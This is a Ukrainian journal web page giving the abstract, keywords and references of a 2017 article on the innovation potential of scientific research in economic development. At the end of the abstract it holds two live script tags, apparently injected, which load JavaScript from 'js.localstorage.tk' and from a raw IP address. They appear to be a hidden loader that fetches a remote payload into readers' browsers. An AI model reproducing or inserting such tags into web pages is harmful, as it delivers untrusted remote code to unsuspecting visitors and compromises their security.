ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.341.1
Інноваційна діяльність та інтелектуальний капітал

Теоретичні засади формування і реалізації інноваційного потенціалу в розвитку економіки / Володін С.А., Чекамова О.І. // Економіка АПК. - 2017. - № 5 - С. 65

Мета статті - формування ефективної системи продукування конкурентоспроможних наукових розробок, перетворення їх в інновації та трансфер інновацій за системою інноваційного провайдингу. У процесі дослідження використано загальнонаукові методи аналізу і синтезу, наукової абстракції, порівняльного аналізу тощо. Також застосовано системний підхід при розгляді процесу створення, капіталізації і трансферу нововведень. Як елемент наукової новизни обґрунтовано сутність поняття інноваційного потенціалу наукової розробки як можливості й готовності до використання сукупності певних характеристик продукту, які сприяють його реалізації на наукоємному ринку, в структурі якого можна виділити інформаційну складову, що визначає сутність розробки та характеризується новизною й корисністю; правову складову як систему організації монопольного використання прав на інтелектуальний продукт та економічну (вартісну) складову, яка дає змогу оптимізувати економічні показники науково-інноваційної діяльності. Запропоновано концептуальний підхід до підвищення інноваційного потенціалу науково-технічної продукції на основі застосування системи наукового інновінгу, що являє собою технологію створення інноваційних продуктів із використанням цілеспрямованого прагматичного творчого пошуку. За результатами дослідження обґрунтовано висновок, що оцінка інноваційного потенціалу науково-інноваційної продукції є критерієм результативності науково-інноваційного процесу. Рис.: 2. Бібліогр.: 30.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ефективність, інноваційний потенціал, науково-інноваційна діяльність, науковий інновінг, програмно-цільовий підхід

Список використаних джерел

 1. Александрова В.П. Ліцензія як засіб обміну науково-технічними досягненнями та ефективного їх використання / В.П. Александрова, Т.І. Щедріна // Проблеми науки. - 2001. - №7. - С. 21-25.
 2. Андрощук Г.О. Економічний механізм стимулювання інновацій / Г.О. Андрощук // Проблеми науки. - 2000. - №1. - С. 24-30.
 3. Ансофф И. Стратегическое управление / И. Ансофф - М.: Экономика, 1989. - 303 с.
 4. Бажал Ю.М. Інноваційний розвиток економіки та напрями його прискорення: наук. доп. / Ю.М. Бажал, І.В. Одотюк, М.С. Данько [та ін.]. - К.: Ін-т економічного прогнозування НАНУ, 2002. - 80 с.
 5. Бендиков М.А. Рынки высокотехнологичной продукции: тенденции и перспективы развития / М.А. Бендиков, И.Э. Фролов // Маркетинг в России и за рубежом. - 2001. - №2. - С. 147-156.
 6. Большая Советская энциклопедия / Т. 20. - M.: Изд-во БСЭ, 1975. - 352 с.
 7. Валдайцев С.В. Управление инновационным бізнесом / С.В. Валдайцев. - М., 2001. - 344 с.
 8. Володін С.А. Інноваційний розвиток аграрної науки: моногр. / С.А. Володін. - К.: МАУП, 2006. - 400 с.
 9. Володін С.А. Теоретико-методологічні та організаційні засади інноваційного провайдингу на наукоємному аграрному ринку / С.А. Володін - К.: ЗАТ «Нічлава», 2007. - 384 с.
 10. Геєць В.М. Інноваційні перспективи України / В.М. Геєць, В.П. Семиноженко - Х.: Константа, 2006. - 272 с.
 11. Горц А. Знание, стоимость и капитал. К критике экономики знаний / А. Горц // Логос: философско-литературный журнал. - 2007.- №4. - С. 5-63.
 12. Інноваційне забезпечення розвитку сільського господарства України: проблеми та перспективи / Ю.О. Лупенко, М.Й. Малік, О.Г. Шпикуляк [та ін.]. - К.: ННЦ ІАЕ, 2014. - 516 с.
 13. Крисальний О.В. Організаційно-економічні особливості інноваційної діяльності / О.В. Крисальний. - Економіка АПК. - 2005. - №8. - С. 10-13.
 14. Курило Л.І. Інтелектуальний капітал в аграрній сфері економіки / Л.І. Курило. - К.: ННЦ ІАЕ, 2012. - 322 с.
 15. Лопатин В.А. Русский толковый словарь / В. А. Лопатин, Л. Е. Лопатина; изд. 7-е, испр. и доп. - M.: Рус. яз., 2001. - 882 с.
 16. Нижегородцев Р.М. Информационная экономика. Кн. 2. Управление беспорядком: Экономические основы производства и обращения информации / Р.М. Нижегородцев. - М.: Кострома, 2002. - 174 с.
 17. Ожегов С.И. Толковый словарь русского языка: 80000 слов и фразеологических выражений / С. И. Ожегов, Н. Ю. Шведова: Российская академия наук. Институт русского языка им. В.В. Виноградова; Изд. 4-е, доп. - M.: Азбуковник, 1999. - 944 с.
 18. Пигоров Г.С. Креатология и интеллектуальные технологии инновационного развития: учеб. для ВУЗов / Г.С. Пигоров, В.П. Козинец, А.Г. Махмудов [и др.] - Днепропетровск: Пороги, 2003. - 502 с.
 19. Санто Б. Инновация как средство экономического развития / Б.Санто; пер. с венг. с изм. и доп. автора; общ. ред. и вступ. от Б.В. Сазонова. - М.: Прогресс, 1990. - 296 с.
 20. Советский энциклопедический словарь / Гл. ред. А. M. Прохоров; изд. 4-е. - M.: Сов. энциклопедия, 1987. - 1600 с., с. 1046.
 21. Фатхутдинов Р.А. Инновационный менеджмент: учебник для вузов. 5-е изд. / Р. А. Фатхутдинов - СПб.: Питер, 2005. - 448 с.
 22. Федулова Л. Стратегія управління інтелектуальною власністю в умовах інноваційної економіки / Л. Федулова // Персонал. - 2006. - №11. - С. 72-80.
 23. Шкворець Ю. Програмно-цільове управління реалізацією пріоритетних напрямів соціально-економічного та науково-технічного розвитку / Ю. Шкворець // Економіка України. - 2001. - № 7. - С. 14-18.
 24. Barnett H G. Innovation: The Basis of Cultural Change / H. G. Barnett. - New York : McGraw-Hill Book Company, 1953. - 462 р.
 25. Drucker P. Innovation and Entrepreneurship : Practice and Principles / P.R. Drucker. - New York: Harper and Row, 1985. - 277 р.
 26. Freeman C. The National System of Innovation in Historical Perspective / C. Freeman // Cambridge Journal of Economics. - 1995. - Vol. 19. - P. 5-24.
 27. Man J. Creating innovation / J. Man // Work Study. - Vol. 50, №3. - 2001. - P.229-233.
 28. Mensch G. Stalemate in Technology - Innovations Overcome the Depression. - New York: Ballinger Publishing Company, 1979. - 241 p.
 29. Schumpeter J.A. The theory of economic growth / Cambridge, MA: Harvard University Press, 1934. - 255 p.
 30. Twiss B. Managing technological innovation / B. Twiss. - 4 ed. - London : Pitman Publishing, 1992. - 758 p.
Читати статтю: e_apk_2017_5_12.pdf